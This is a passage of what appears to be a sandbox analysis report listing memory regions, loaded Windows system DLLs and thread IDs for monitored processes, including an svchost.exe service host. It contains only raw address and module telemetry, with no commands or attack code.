"pagefile_0x0000000000400000" filename = "" Region: id = 5572 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5573 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5574 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5575 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5576 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5577 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5578 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5579 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5580 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5581 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5582 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5583 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5584 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5585 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5586 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5587 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5588 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5589 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5590 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5591 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5592 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5593 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5594 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5595 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5596 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5597 start_va = 0x400000 end_va = 0x418fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5598 start_va = 0x7ff83ba30000 end_va = 0x7ff83ba3afff monitored = 0 entry_point = 0x7ff83ba31de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 5599 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5600 start_va = 0x7ff83b8d0000 end_va = 0x7ff83b8e9fff monitored = 0 entry_point = 0x7ff83b8d45a0 region_type = mapped_file name = "esentprf.dll" filename = "\\Windows\\System32\\esentprf.dll" (normalized: "c:\\windows\\system32\\esentprf.dll") Region: id = 5601 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 5602 start_va = 0x420000 end_va = 0x423fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 5603 start_va = 0x7ff839b10000 end_va = 0x7ff839b1bfff monitored = 0 entry_point = 0x7ff839b135c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 5604 start_va = 0x420000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 5605 start_va = 0x7ff83b610000 end_va = 0x7ff83b662fff monitored = 0 entry_point = 0x7ff83b63ab30 region_type = mapped_file name = "msdtcuiu.dll" filename = "\\Windows\\System32\\msdtcuiu.dll" (normalized: "c:\\windows\\system32\\msdtcuiu.dll") Region: id = 5606 start_va = 0x430000 end_va = 0x431fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 5607 start_va = 0x7ff846200000 end_va = 0x7ff846342fff monitored = 0 entry_point = 0x7ff846228210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5608 start_va = 0x7ff843750000 end_va = 0x7ff844caefff monitored = 0 entry_point = 0x7ff8438b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5609 start_va = 0x7ff842e70000 end_va = 0x7ff8434b3fff monitored = 0 entry_point = 0x7ff8430364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5610 start_va = 0x7ff843690000 end_va = 0x7ff843744fff monitored = 0 entry_point = 0x7ff8436d22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5611 start_va = 0x7ff842970000 end_va = 0x7ff8429bafff monitored = 0 entry_point = 0x7ff8429735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5612 start_va = 0x7ff8429c0000 end_va = 0x7ff8429d3fff monitored = 0 entry_point = 0x7ff8429c52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5613 start_va = 0x7ff8413e0000 end_va = 0x7ff841489fff monitored = 0 entry_point = 0x7ff841407910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5614 start_va = 0x7ff845250000 end_va = 0x7ff845257fff monitored = 0 entry_point = 0x7ff845251ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5615 start_va = 0x7ff837ce0000 end_va = 0x7ff837cfdfff monitored = 0 entry_point = 0x7ff837ce3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 5616 start_va = 0x7ff82cdc0000 end_va = 0x7ff82ce9cfff monitored = 0 entry_point = 0x7ff82ce3d590 region_type = mapped_file name = "msdtcprx.dll" filename = "\\Windows\\System32\\msdtcprx.dll" (normalized: "c:\\windows\\system32\\msdtcprx.dll") Region: id = 5617 start_va = 0x7ff83b4f0000 end_va = 0x7ff83b559fff monitored = 0 entry_point = 0x7ff83b51e410 region_type = mapped_file name = "mtxclu.dll" filename = "\\Windows\\System32\\mtxclu.dll" (normalized: "c:\\windows\\system32\\mtxclu.dll") Region: id = 5618 start_va = 0x7ff839430000 end_va = 0x7ff8394d2fff monitored = 0 entry_point = 0x7ff839432c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 5619 start_va = 0x7ff8394e0000 end_va = 0x7ff839531fff monitored = 0 entry_point = 0x7ff8394e5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 5620 start_va = 0x7ff83c4b0000 end_va = 0x7ff83c4bafff monitored = 0 entry_point = 0x7ff83c4b24e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 5621 start_va = 0x7ff842540000 end_va = 0x7ff842566fff monitored = 0 entry_point = 0x7ff842550aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 5622 start_va = 0x7ff842500000 end_va = 0x7ff842539fff monitored = 0 entry_point = 0x7ff842508d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 5623 start_va = 0x7ff8422f0000 end_va = 0x7ff842306fff monitored = 0 entry_point = 0x7ff8422f79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5624 start_va = 0x7ff83d300000 end_va = 0x7ff83d315fff monitored = 0 entry_point = 0x7ff83d301b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5625 start_va = 0x7ff837ca0000 end_va = 0x7ff837cb1fff monitored = 0 entry_point = 0x7ff837ca3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 5626 start_va = 0x7ff841d80000 end_va = 0x7ff841d8bfff monitored = 0 entry_point = 0x7ff841d827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5627 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 5628 start_va = 0x7ff83bd50000 end_va = 0x7ff83bd5ffff monitored = 0 entry_point = 0x7ff83bd55b40 region_type = mapped_file name = "msscntrs.dll" filename = "\\Windows\\System32\\msscntrs.dll" (normalized: "c:\\windows\\system32\\msscntrs.dll") Region: id = 5629 start_va = 0x7ff83b8c0000 end_va = 0x7ff83b8cffff monitored = 0 entry_point = 0x7ff83b8c5870 region_type = mapped_file name = "perfdisk.dll" filename = "\\Windows\\System32\\perfdisk.dll" (normalized: "c:\\windows\\system32\\perfdisk.dll") Region: id = 5630 start_va = 0x2cf0000 end_va = 0x2d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 5631 start_va = 0x7ff83b8b0000 end_va = 0x7ff83b8bafff monitored = 0 entry_point = 0x7ff83b8b2e30 region_type = mapped_file name = "perfnet.dll" filename = "\\Windows\\System32\\perfnet.dll" (normalized: "c:\\windows\\system32\\perfnet.dll") Region: id = 5632 start_va = 0x7ff842b60000 end_va = 0x7ff842b76fff monitored = 0 entry_point = 0x7ff842b61390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5633 start_va = 0x7ff83b890000 end_va = 0x7ff83b8a3fff monitored = 0 entry_point = 0x7ff83b891310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5634 start_va = 0x7ff83b880000 end_va = 0x7ff83b88dfff monitored = 0 entry_point = 0x7ff83b882b10 region_type = mapped_file name = "perfos.dll" filename = "\\Windows\\System32\\perfos.dll" (normalized: "c:\\windows\\system32\\perfos.dll") Region: id = 5635 start_va = 0x2d70000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 5636 start_va = 0x7ff83b7c0000 end_va = 0x7ff83b7cefff monitored = 0 entry_point = 0x7ff83b7c59a0 region_type = mapped_file name = "perfproc.dll" filename = "\\Windows\\System32\\perfproc.dll" (normalized: "c:\\windows\\system32\\perfproc.dll") Region: id = 5637 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5638 start_va = 0x780000 end_va = 0x79dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 5639 start_va = 0x2df0000 end_va = 0x35effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002df0000" filename = "" Region: id = 5640 start_va = 0x14f0000 end_va = 0x1510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014f0000" filename = "" Region: id = 5641 start_va = 0x780000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 5642 start_va = 0x450000 end_va = 0x453fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5643 start_va = 0x7ff839800000 end_va = 0x7ff83990dfff monitored = 0 entry_point = 0x7ff839867960 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 5644 start_va = 0x7ff83b7b0000 end_va = 0x7ff83b7b9fff monitored = 0 entry_point = 0x7ff83b7b31a0 region_type = mapped_file name = "rasctrs.dll" filename = "\\Windows\\System32\\rasctrs.dll" (normalized: "c:\\windows\\system32\\rasctrs.dll") Region: id = 5645 start_va = 0x2df0000 end_va = 0x2e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 5646 start_va = 0x7ff83c2a0000 end_va = 0x7ff83c323fff monitored = 0 entry_point = 0x7ff83c2b2830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 5647 start_va = 0x7ff83b7a0000 end_va = 0x7ff83b7a7fff monitored = 0 entry_point = 0x7ff83b7a18a0 region_type = mapped_file name = "tapiperf.dll" filename = "\\Windows\\System32\\tapiperf.dll" (normalized: "c:\\windows\\system32\\tapiperf.dll") Region: id = 5648 start_va = 0x7ff83b5f0000 end_va = 0x7ff83b600fff monitored = 0 entry_point = 0x7ff83b5f5840 region_type = mapped_file name = "perfctrs.dll" filename = "\\Windows\\System32\\perfctrs.dll" (normalized: "c:\\windows\\system32\\perfctrs.dll") Region: id = 5649 start_va = 0x7ff83e130000 end_va = 0x7ff83e167fff monitored = 0 entry_point = 0x7ff83e148cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5650 start_va = 0x7ff83b790000 end_va = 0x7ff83b797fff monitored = 0 entry_point = 0x7ff83b792420 region_type = mapped_file name = "perfts.dll" filename = "\\Windows\\System32\\perfts.dll" (normalized: "c:\\windows\\system32\\perfts.dll") Region: id = 5651 start_va = 0x7ff8424a0000 end_va = 0x7ff8424f5fff monitored = 0 entry_point = 0x7ff8424b0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5652 start_va = 0x7ff83b5d0000 end_va = 0x7ff83b5e7fff monitored = 0 entry_point = 0x7ff83b5d1630 region_type = mapped_file name = "utildll.dll" filename = "\\Windows\\System32\\utildll.dll" (normalized: "c:\\windows\\system32\\utildll.dll") Region: id = 5653 start_va = 0x7ff8454b0000 end_va = 0x7ff8458d8fff monitored = 0 entry_point = 0x7ff8454d8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 5654 start_va = 0x7ff8372a0000 end_va = 0x7ff8372c5fff monitored = 0 entry_point = 0x7ff8372a1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5655 start_va = 0x7ff839700000 end_va = 0x7ff839718fff monitored = 0 entry_point = 0x7ff839704520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5656 start_va = 0x7ff83dc80000 end_va = 0x7ff83dcbdfff monitored = 0 entry_point = 0x7ff83dc8a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5657 start_va = 0x7ff83b5c0000 end_va = 0x7ff83b5c7fff monitored = 0 entry_point = 0x7ff83b5c1e20 region_type = mapped_file name = "usbperf.dll" filename = "\\Windows\\System32\\usbperf.dll" (normalized: "c:\\windows\\system32\\usbperf.dll") Region: id = 5658 start_va = 0x7ff82cd90000 end_va = 0x7ff82cdb5fff monitored = 0 entry_point = 0x7ff82cda0d80 region_type = mapped_file name = "wmiaprpl.dll" filename = "\\Windows\\System32\\wbem\\WmiApRpl.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiaprpl.dll") Region: id = 5659 start_va = 0x7ff83c230000 end_va = 0x7ff83c254fff monitored = 0 entry_point = 0x7ff83c23b320 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 5660 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 5664 start_va = 0x7ff828e20000 end_va = 0x7ff82918efff monitored = 0 entry_point = 0x7ff828f21610 region_type = mapped_file name = "tquery.dll" filename = "\\Windows\\System32\\tquery.dll" (normalized: "c:\\windows\\system32\\tquery.dll") Region: id = 5666 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5668 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5670 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5672 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5674 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5676 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5680 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5684 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5686 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5688 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5690 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5692 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5694 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5696 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5698 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5701 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5703 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5705 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5707 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5710 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5712 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5714 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5726 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5727 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 5728 start_va = 0x780000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 5729 start_va = 0x2e70000 end_va = 0x2eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 5730 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5732 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5734 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5738 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5747 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 5748 start_va = 0x780000 end_va = 0x79bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 5749 start_va = 0x2e70000 end_va = 0x366ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e70000" filename = "" Region: id = 5750 start_va = 0xfb0000 end_va = 0xfd4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fb0000" filename = "" Region: id = 5751 start_va = 0x780000 end_va = 0x7a4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Thread: id = 99 os_tid = 0xc38 Thread: id = 100 os_tid = 0x13f8 Thread: id = 101 os_tid = 0x138c Thread: id = 102 os_tid = 0x1388 Thread: id = 103 os_tid = 0x1380 Thread: id = 104 os_tid = 0xb9c Thread: id = 105 os_tid = 0x34c Thread: id = 106 os_tid = 0x2a4 Thread: id = 107 os_tid = 0xf34 Thread: id = 108 os_tid = 0xf24 Thread: id = 109 os_tid = 0xf1c Thread: id = 110 os_tid = 0xf28 Thread: id = 111 os_tid = 0x828 Thread: id = 112 os_tid = 0x820 Thread: id = 153 os_tid = 0xf54 Thread: id = 155 os_tid = 0x384 Thread: id = 156 os_tid = 0x1288 Thread: id = 157 os_tid = 0x101c Thread: id = 158 os_tid = 0x1298 Thread: id = 159 os_tid = 0x1398 Thread: id = 160 os_tid = 0x133c Thread: id = 161 os_tid = 0xc78 Thread: id = 162 os_tid = 0x13a4 Thread: id = 165 os_tid = 0x1004 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3c84c000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x21c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e2b3" [0xc000000f], "LOCAL" [0x7] Region: id = 959 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 960 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 961 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 962 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 963 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 964 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 965 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 966 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 967 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 968 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 969 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 970 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 971 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 972 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 973 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 974 start_va = 0x550000 end_va = 0x556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 975 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 976 start_va 